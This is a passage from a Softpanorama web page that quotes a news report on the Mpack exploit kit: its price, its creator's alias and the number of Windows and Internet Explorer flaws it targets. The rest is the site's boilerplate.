Still other researchers rooted out details of Mpack, including its price and the nom-de-plume of its creator. Ken Dunham, director of VeriSign-iDefense's rapid response team, said Mpack sells for around US$1,000, and that the man [or woman] behind it goes by "$ash" in the Russian hacker underground. The latest version of Mpack, .90, includes exploits for eight different vulnerabilities, six of them flaws in Windows or Internet Explorer, including the dangerous ANI bug that affected Vista earlier this year.

"This is a powerful Web exploitation tool," Dunham said.

Recommended Links

Softpanorama hot topic of the month

Softpanorama Recommended


Etc

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available in our efforts to advance understanding of environmental, political, human rights, economic, democracy, scientific, and social justice issues, etc. We believe this constitutes a 'fair use' of any such copyrighted material as provided for in section 107 of the US Copyright Law. In accordance with Title 17 U.S.C. Section 107, the material on this site is distributed without profit exclusivly for research and educational purposes.   If you wish to use copyrighted material from this site for purposes of your own that go beyond 'fair use', you must obtain permission from the copyright owner. 

ABUSE: IPs or network segments from which we detect a stream of probes might be blocked for no less then 90 days. Multiple types of probes increase this period.  

Society

Groupthink : Two Party System as Polyarchy : Corruption of Regulators : Bureaucracies : Understanding Micromanagers and Control Freaks : Toxic Managers :   Harvard Mafia : Diplomatic Communication : Surviving a Bad Performance Review : Insufficient Retirement Funds as Immanent Problem of Neoliberal Regime : PseudoScience : Who Rules America : Neoliberalism  : The Iron Law of Oligarchy : Libertarian Philosophy

Quotes

War and Peace : Skeptical Finance : John Kenneth Galbraith :Talleyrand : Oscar Wilde : Otto Von Bismarck : Keynes : George Carlin : Skeptics : Propaganda  : SE quotes : Language Design and Programming Quotes : Random IT-related quotesSomerset Maugham : Marcus Aurelius : Kurt Vonnegut : Eric Hoffer : Winston Churchill : Napoleon Bonaparte : Ambrose BierceBernard Shaw : Mark Twain Quotes

Bulletin:

Vol 25, No.12 (December, 2013) Rational Fools vs. Efficient Crooks The efficient markets hypothesis : Political Skeptic Bulletin, 2013 : Unemployment Bulletin, 2010 :  Vol 23, No.10 (October, 2011) An observation about corporate security departments : Slightly Skeptical Euromaydan Chronicles, June 2014 : Greenspan legacy bulletin, 2008 : Vol 25, No.10 (October, 2013) Cryptolocker Trojan (Win32/Crilock.A) : Vol 25, No.08 (August, 2013) Cloud providers as intelligence collection hubs : Financial Humor Bulletin, 2010 : Inequality Bulletin, 2009 : Financial Humor Bulletin, 2008 : Copyleft Problems Bulletin, 2004 : Financial Humor Bulletin, 2011 : Energy Bulletin, 2010 : Malware Protection Bulletin, 2010 : Vol 26, No.1 (January, 2013) Object-Oriented Cult : Political Skeptic Bulletin, 2011 : Vol 23, No.11 (November, 2011) Softpanorama classification of sysadmin horror stories : Vol 25, No.05 (May, 2013) Corporate bullshit as a communication method  : Vol 25, No.06 (June, 2013) A Note on the Relationship of Brooks Law and Conway Law

History:

Fifty glorious years (1950-2000): the triumph of the US computer engineering : Donald Knuth : TAoCP and its Influence of Computer Science : Richard Stallman : Linus Torvalds  : Larry Wall  : John K. Ousterhout : CTSS : Multix OS Unix History : Unix shell history : VI editor : History of pipes concept : Solaris : MS DOSProgramming Languages History : PL/1 : Simula 67 : C : History of GCC developmentScripting Languages : Perl history   : OS History : Mail : DNS : SSH : CPU Instruction Sets : SPARC systems 1987-2006 : Norton Commander : Norton Utilities : Norton Ghost : Frontpage history : Malware Defense History : GNU Screen : OSS early history

Classic books:

The Peter Principle : Parkinson Law : 1984 : The Mythical Man-MonthHow to Solve It by George Polya : The Art of Computer Programming : The Elements of Programming Style : The Unix Hater’s Handbook : The Jargon file : The True Believer : Programming Pearls : The Good Soldier Svejk : The Power Elite

Most popular humor pages:

Manifest of the Softpanorama IT Slacker Society : Ten Commandments of the IT Slackers Society : Computer Humor Collection : BSD Logo Story : The Cuckoo's Egg : IT Slang : C++ Humor : ARE YOU A BBS ADDICT? : The Perl Purity Test : Object oriented programmers of all nations : Financial Humor : Financial Humor Bulletin, 2008 : Financial Humor Bulletin, 2010 : The Most Comprehensive Collection of Editor-related Humor : Programming Language Humor : Goldman Sachs related humor : Greenspan humor : C Humor : Scripting Humor : Real Programmers Humor : Web Humor : GPL-related Humor : OFM Humor : Politically Incorrect Humor : IDS Humor : "Linux Sucks" Humor : Russian Musical Humor : Best Russian Programmer Humor : Microsoft plans to buy Catholic Church : Richard Stallman Related Humor : Admin Humor : Perl-related Humor : Linus Torvalds Related humor : PseudoScience Related Humor : Networking Humor : Shell Humor : Financial Humor Bulletin, 2011 : Financial Humor Bulletin, 2012 : Financial Humor Bulletin, 2013 : Java Humor : Software Engineering Humor : Sun Solaris Related Humor : Education Humor : IBM Humor : Assembler-related Humor : VIM Humor : Computer Viruses Humor : Bright tomorrow is rescheduled to a day after tomorrow : Classic Computer Humor

The Last but not Least


Copyright © 1996-2015 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author free time. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License.

The site uses AdSense so you need to be aware of Google privacy policy. You you do not want to be tracked by Google please disable Javascript for this site. This site is perfectly usable without Javascript.

Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.

This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contain some broken links as it develops like a living tree...

You can use PayPal to make a contribution, supporting development of this site and speed up access. In case softpanorama.org is down currently there are two functional mirrors: softpanorama.info (the fastest) and softpanorama.net.

Disclaimer:

The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the author present and former employers, SDNP or any other organization the author may be associated with. We do not warrant the correctness of the information provided or its fitness for any purpose.

Last modified: June 04, 2016